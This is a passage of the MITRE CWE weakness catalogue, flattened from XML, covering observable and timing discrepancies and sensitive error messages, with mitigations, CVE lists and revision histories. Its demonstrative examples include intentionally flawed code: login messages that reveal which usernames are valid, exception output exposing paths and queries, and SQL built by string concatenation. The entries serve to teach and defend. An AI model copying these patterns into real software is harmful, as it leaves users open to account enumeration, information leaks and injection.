Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Maintenance_Notes, Name, References, Relationships - - Information Leak Through Data Queries - Privacy Leak through Data Queries - Exposure of Sensitive Data Through Data Queries - - - - The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not. - Discrepancies can take many forms, and variations may be detectable in timing, control flow, communications such as replies or requests, or general behavior. These discrepancies can reveal information about the product's operation or internal state to an unauthorized actor. In some cases, discrepancies can be used by attackers to form a side channel. - - - - - - - - - - - Side Channel Attack - Observable Discrepancies are at the root of side channel attacks. - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Access Control - Read Application Data - Bypass Protection Mechanism - An attacker can gain access to sensitive information about the system, including authentication information that may allow an attacker to gain access to the system. - - - Confidentiality - Read Application Data - When cryptographic primitives are vulnerable to side-channel-attacks, this could be used to reveal unencrypted plaintext in the worst case. - - - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - Implementation - - Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. - If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. - Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. - - - - - - The following code checks validity of the supplied username and password and notifies the user of a successful or failed login. - - my $username=param('username'); - my $password=param('password'); - - if (IsValidUsername($username) == 1) - { - if (IsValidPassword($username, $password) == 1) - { - print "Login Successful"; - } - else - { - print "Login Failed - incorrect password"; - } - } - else - { - print "Login Failed - unknown username"; - } - - - In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials. - While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as: - - "Login Failed - incorrect username or password" - - - - Non-uniform processing time causes timing channel. - Suppose an algorithm for implementing an encryption routine works fine per se, but the time taken to output the result of the encryption routine depends on a relationship between the input plaintext and the key (e.g., suppose, if the plaintext is similar to the key, it would run very fast). - In the example above, an attacker may vary the inputs, then observe differences between processing times (since different plaintexts take different time). This could be used to infer information about the key. - Artificial delays may be added to ensured all calculations take equal time to execute. - - - Suppose memory access patterns for an encryption routine are dependent on the secret key. - An attacker can recover the key by knowing if specific memory locations have been accessed or not. The value stored at those memory locations is irrelevant. The encryption routine's memory accesses will affect the state of the processor cache. If cache resources are shared across contexts, after the encryption routine completes, an attacker in different execution context can discover which memory locations the routine accessed by measuring the time it takes for their own memory accesses to complete. - - - - - CVE-2020-8695 - Observable discrepancy in the RAPL interface for some Intel processors allows information disclosure. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8695 - - - CVE-2002-2094 - This, and others, use ".." attacks and monitor error responses, so there is overlap with directory traversal. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2094 - - - CVE-2001-1483 - Enumeration of valid usernames based on inconsistent responses - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1483 - - - CVE-2001-1528 - Account number enumeration via inconsistent responses. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1528 - - - CVE-2004-2150 - User enumeration via discrepancies in error messages. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2150 - - - CVE-2005-1650 - User enumeration via discrepancies in error messages. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1650 - - - CVE-2004-0294 - Bulletin Board displays different error messages when a user exists or not, which makes it easier for remote attackers to identify valid users and conduct a brute force password guessing attack. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0294 - - - CVE-2004-0243 - Operating System, when direct remote login is disabled, displays a different message if the password is correct, which allows remote attackers to guess the password via brute force methods. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0243 - - - CVE-2002-0514 - Product allows remote attackers to determine if a port is being filtered because the response packet TTL is different than the default TTL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0514 - - - CVE-2002-0515 - Product sets a different TTL when a port is being filtered than when it is not being filtered, which allows remote attackers to identify filtered ports by comparing TTLs. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0515 - - - CVE-2002-0208 - Product modifies TCP/IP stack and ICMP error messages in unusual ways that show the product is in use. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0208 - - - CVE-2004-2252 - Behavioral infoleak by responding to SYN-FIN packets. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2252 - - - CVE-2001-1387 - Product may generate different responses than specified by the administrator, possibly leading to an information leak. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1387 - - - CVE-2004-0778 - Version control system allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0778 - - - CVE-2004-1428 - FTP server generates an error message if the user name does not exist instead of prompting for a password, which allows remote attackers to determine valid usernames. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1428 - - - CVE-2003-0078 - SSL implementation does not perform a MAC computation if an incorrect block cipher padding is used, which causes an information leak (timing discrepancy) that may make it easier to launch cryptographic attacks that rely on distinguishing between padding and MAC verification errors, possibly leading to extraction of the original plaintext, aka the "Vaudenay timing attack." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0078 - - - CVE-2000-1117 - Virtual machine allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1117 - - - CVE-2003-0637 - Product uses a shorter timeout for a non-existent user than a valid user, which makes it easier for remote attackers to guess usernames and conduct brute force password guessing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0637 - - - CVE-2003-0190 - Product immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190 - - - CVE-2004-1602 - FTP server responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1602 - - - CVE-2005-0918 - Browser allows remote attackers to determine the existence of arbitrary files by setting the src property to the target filename and using Javascript to determine if the web page immediately stops loading, which indicates whether the file exists or not. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0918 - - - - - Discrepancy Information Leaks - - - A6 - Information Leakage and Improper Error Handling - CWE More Specific - - - A7 - Improper Error Handling - CWE More Specific - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-12-28 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Alternate_Terms, Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships, Research_Gaps - - - CWE Content Team - MITRE - 2020-12-10 - updated Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, Research_Gaps - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples - - - Nicole Fern - Tortuga Logic - 2020-06-03 - Provided Demonstrative Example for cache timing attack - - Discrepancy Information Leaks - Information Exposure Through Discrepancy - Observable Discrepancy - Observable Differences in Behavior to Error Inputs - - - - The product provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor outside of the intended control sphere. - This issue frequently occurs during authentication, where a difference in failed-login messages could allow an attacker to determine if the username is valid or not. These exposures can be inadvertent (bug) or intentional (design). - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Access Control - Read Application Data - Bypass Protection Mechanism - - - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - Implementation - - Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. - If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. - Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. - - - - - - The following code checks validity of the supplied username and password and notifies the user of a successful or failed login. - - my $username=param('username'); - my $password=param('password'); - - if (IsValidUsername($username) == 1) - { - if (IsValidPassword($username, $password) == 1) - { - print "Login Successful"; - } - else - { - print "Login Failed - incorrect password"; - } - } - else - { - print "Login Failed - unknown username"; - } - - - In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials. - While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as: - - "Login Failed - incorrect username or password" - - - - - - CVE-2002-2094 - This, and others, use ".." attacks and monitor error responses, so there is overlap with directory traversal. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2094 - - - CVE-2001-1483 - Enumeration of valid usernames based on inconsistent responses - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1483 - - - CVE-2001-1528 - Account number enumeration via inconsistent responses. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1528 - - - CVE-2004-2150 - User enumeration via discrepancies in error messages. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2150 - - - CVE-2005-1650 - User enumeration via discrepancies in error messages. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1650 - - - CVE-2004-0294 - Bulletin Board displays different error messages when a user exists or not, which makes it easier for remote attackers to identify valid users and conduct a brute force password guessing attack. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0294 - - - CVE-2004-0243 - Operating System, when direct remote login is disabled, displays a different message if the password is correct, which allows remote attackers to guess the password via brute force methods. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0243 - - - CVE-2002-0514 - Product allows remote attackers to determine if a port is being filtered because the response packet TTL is different than the default TTL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0514 - - - CVE-2002-0515 - Product sets a different TTL when a port is being filtered than when it is not being filtered, which allows remote attackers to identify filtered ports by comparing TTLs. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0515 - - - CVE-2001-1387 - Product may generate different responses than specified by the administrator, possibly leading to an information leak. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1387 - - - CVE-2004-0778 - Version control system allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0778 - - - CVE-2004-1428 - FTP server generates an error message if the user name does not exist instead of prompting for a password, which allows remote attackers to determine valid usernames. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1428 - - - - - Response discrepancy infoleak - - - - - - - can overlap errors related to escalated privileges - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-09-27 - updated Description, Name, Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - Response Discrepancy Information Leak - Response Discrepancy Information Exposure - - - - The product's behaviors indicate important differences that may be observed by unauthorized actors in a way that reveals (1) its internal state or decision process, or (2) differences from other products with equivalent functionality. - - Ideally, a product should provide as little information about its internal operations as possible. Otherwise, attackers could use knowledge of these internal operations to simplify or optimize their attack. In some cases, behavioral discrepancies can be used by attackers to form a side channel. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Access Control - Read Application Data - Bypass Protection Mechanism - - - - - CVE-2002-0208 - Product modifies TCP/IP stack and ICMP error messages in unusual ways that show the product is in use. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0208 - - - CVE-2004-2252 - Behavioral infoleak by responding to SYN-FIN packets. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2252 - - - - - Behavioral Discrepancy Infoleak - - - 45 - Fingerprinting - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-12-28 - updated Description, Name - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - Behavioral Discrepancy Information Leak - Information Exposure Through Behavioral Discrepancy - - - - The product performs multiple behaviors that are combined to produce a single result, but the individual behaviors are observable separately in a way that allows attackers to reveal internal state or internal decision points. - - Ideally, a product should provide as little information as possible to an attacker. Any hints that the attacker may be making progress can then be used to simplify or optimize the attack. For example, in a login procedure that requires a username and password, ultimately there is only one decision: success or failure. However, internally, two separate actions are performed: determining if the username exists, and checking if the password is correct. If the product behaves differently based on whether the username exists or not, then the attacker only needs to concentrate on the password. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Access Control - Read Application Data - Bypass Protection Mechanism - - - - - Setup generic response pages for error conditions. The error page should not disclose information about the success or failure of a sensitive operation. For instance, the login page should not confirm that the login is correct and the password incorrect. The attacker who tries random account name may be able to guess some of them. Confirming that the account exists would make the login page more susceptible to brute force attack. - - - - - CVE-2002-2031 - File existence via infoleak monitoring whether "onerror" handler fires or not. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2031 - - - CVE-2005-2025 - Valid groupname enumeration via behavioral infoleak (sends response if valid, doesn't respond if not). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2025 - - - CVE-2001-1497 - Behavioral infoleak in GUI allows attackers to distinguish between alphanumeric and non-alphanumeric characters in a password, thus reducing the search space. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1497 - - - CVE-2003-0190 - Product immediately sends an error message when user does not exist instead of waiting until the password is provided, allowing username enumeration. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190 - - - - - Internal behavioral inconsistency infoleak - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Potential_Mitigations, Relationships - - Internal Behavioral Inconsistency Information Leak - Information Exposure of Internal State Through Behavioral Inconsistency - - - - The product operates in an environment in which its existence or specific identity should not be known, but it behaves differently than other products with equivalent functionality, in a way that is observable to an attacker. - - For many kinds of products, multiple products may be available that perform the same functionality, such as a web server, network interface, or intrusion detection system. Attackers often perform "fingerprinting," which uses discrepancies in order to identify which specific product is in use. Once the specific product has been identified, the attacks can be made more customized and efficient. Often, an organization might intentionally allow the specific product to be identifiable. However, in some environments, the ability to identify a distinct product is unacceptable, and it is expected that every product would behave in exactly the same way. In these more restricted environments, a behavioral difference might pose an unacceptable risk if it makes it easier to identify the product's vendor, model, configuration, version, etc. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Access Control - Read Application Data - Bypass Protection Mechanism - - - - - CVE-2002-0208 - Product modifies TCP/IP stack and ICMP error messages in unusual ways that show the product is in use. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0208 - - - CVE-2004-2252 - Behavioral infoleak by responding to SYN-FIN packets. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2252 - - - CVE-2000-1142 - Honeypot generates an error with a "pwd" command in a particular directory, allowing attacker to know they are in a honeypot system. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1142 - - - - - External behavioral inconsistency infoleak - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-12-28 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships - - External Behavioral Inconsistency Information Leak - Information Exposure Through an External Behavioral Inconsistency - - - - Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not. - - In security-relevant contexts, even small variations in timing can be exploited by attackers to indirectly infer certain details about the product's internal operations. For example, in some cryptographic algorithms, attackers can use timing differences to infer certain properties about a private key, making the key easier to guess. Timing discrepancies effectively form a timing side channel. - - - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Implementation - - - Operation - - - - - Confidentiality - Access Control - Read Application Data - Bypass Protection Mechanism - - - - - CVE-2003-0078 - SSL implementation does not perform a MAC computation if an incorrect block cipher padding is used, which causes an information leak (timing discrepancy) that may make it easier to launch cryptographic attacks that rely on distinguishing between padding and MAC verification errors, possibly leading to extraction of the original plaintext, aka the "Vaudenay timing attack." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0078 - - - CVE-2000-1117 - Virtual machine allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1117 - - - CVE-2003-0637 - Product uses a shorter timeout for a non-existent user than a valid user, which makes it easier for remote attackers to guess usernames and conduct brute force password guessing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0637 - - - CVE-2003-0190 - Product immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190 - - - CVE-2004-1602 - FTP server responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1602 - - - CVE-2005-0918 - Browser allows remote attackers to determine the existence of arbitrary files by setting the src property to the target filename and using Javascript to determine if the web page immediately stops loading, which indicates whether the file exists or not. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0918 - - - - Cryptography - Authentication - - - - Timing discrepancy infoleak - - - - - - - Often primary in cryptographic applications and algorithms. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - Timing Discrepancy Information Leak - Information Exposure Through Timing Discrepancy - - - - The software generates an error message that includes sensitive information about its environment, users, or associated data. - The sensitive information may be valuable information on its own (such as a password), or it may be useful for launching other, more serious attacks. The error message may be created in different ways: - - - self-generated: the source code explicitly constructs the error message and delivers it - externally-generated: the external environment, such as a language interpreter, handles the error and constructs its own message, whose contents are not under direct control by the programmer - - - An attacker may use the contents of error messages to help launch another, more focused attack. For example, an attempt to exploit a path traversal weakness (CWE-22) might yield the full pathname of the installed application. In turn, this could be used to select the proper number of ".." sequences to navigate to the targeted file. An attack using SQL injection (CWE-89) might not initially succeed, but an error message could reveal the malformed query, which would expose query logic and possibly even passwords or other sensitive information used within the query. - - - - - - - - Primary - - - Resultant - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - System Configuration - - - Operation - - - High - - - Confidentiality - Read Application Data - Often this will either reveal sensitive information which may be used for a later attack or private information stored in the server. - - - - - Manual Analysis - This weakness generally requires domain-specific interpretation using manual analysis. However, the number of potential error conditions may be too large to cover completely within limited time constraints. - High - - - Automated Analysis - Automated methods may be able to detect certain idioms automatically, such as exposed stack traces or pathnames, but violation of business rules or privacy requirements is not typically feasible. - Moderate - - - Automated Dynamic Analysis - - This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - Error conditions may be triggered with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior. - - Moderate - - - Manual Dynamic Analysis - Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application's environment, it may still indicate unexpected conditions that were not handled by the application itself. - - - - - Implementation - - Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. - If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. - Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. - - - - Implementation - Handle exceptions internally and do not display errors containing potentially sensitive information to a user. - - - Implementation - Attack Surface Reduction - Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible. - Defense in Depth - This makes it easier to spot places in the code where data is being used that is unencrypted. - - - Implementation - Build and Compilation - Compilation or Build Hardening - Debugging information should not make its way into a production release. - - - Implementation - Build and Compilation - Environment Hardening - Debugging information should not make its way into a production release. - - - System Configuration - Where available, configure the environment to use less verbose error messages. For example, in PHP, disable the display_errors setting during configuration, or at runtime using the error_reporting() function. - - - System Configuration - Create default error pages or messages that do not leak any information. - - - - - In the following example, sensitive information might be printed depending on the exception that occurs. - - try {/.../}catch (Exception e) {System.out.println(e);} - - If an exception related to SQL is handled by the catch, then the output might contain sensitive information such as SQL query structure or private information. If this output is redirected to a web user, this may represent a security problem. - - - This code tries to open a database connection, and prints any exceptions that occur. - - try {openDbConnection();} - //print exception message that includes exception message and configuration file location - catch (Exception $e) {echo 'Caught exception: ', $e->getMessage(), '\n';echo 'Check credentials in config file at: ', $Mysql_config_location, '\n';} - - If an exception occurs, the printed message exposes the location of the configuration file the script is using. An attacker can use this information to target the configuration file (perhaps exploiting a Path Traversal weakness). If the file can be read, the attacker could gain credentials for accessing the database. The attacker may also be able to replace the file with a malicious one, causing the application to use an arbitrary database. - - - The following code generates an error message that leaks the full pathname of the configuration file. - - $ConfigDir = "/home/myprog/config";$uname = GetUserInput("username"); - - # avoid CWE-22, CWE-78, others. - ExitError("Bad hacker!") if ($uname !~ /^\w+$/);$file = "$ConfigDir/$uname.txt";if (! (-e $file)) {ExitError("Error: $file does not exist");}... - - If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application. - - - In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file. - - public BankAccount getUserBankAccount(String username, String accountNumber) { - BankAccount userAccount = null;String query = null;try {if (isAuthorizedUser(username)) {query = "SELECT * FROM accounts WHERE owner = "+ username + " AND accountID = " + accountNumber;DatabaseManager dbManager = new DatabaseManager();Connection conn = dbManager.getConnection();Statement stmt = conn.createStatement();ResultSet queryResult = stmt.executeQuery(query);userAccount = (BankAccount)queryResult.getObject(accountNumber);}} catch (SQLException ex) {String logMessage = "Unable to retrieve account information from database,\nquery: " + query;Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex);}return userAccount; - } - - The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database. - - - - - CVE-2008-2049 - POP3 server reveals a password in an error message after multiple APOP commands are sent. Might be resultant from another weakness. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2049 - - - CVE-2007-5172 - Program reveals password in error message if attacker can trigger certain database errors. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5172 - - - CVE-2008-4638 - Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638 - - - CVE-2008-1579 - Existence of user names can be determined by requesting a nonexistent blog and reading the error message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1579 - - - CVE-2007-1409 - Direct request to library file in web application triggers pathname leak in error message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1409 - - - CVE-2008-3060 - Malformed input to login page causes leak of full path when IMAP call fails. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3060 - - - CVE-2005-0603 - Malformed regexp syntax leads to information exposure in error message. - 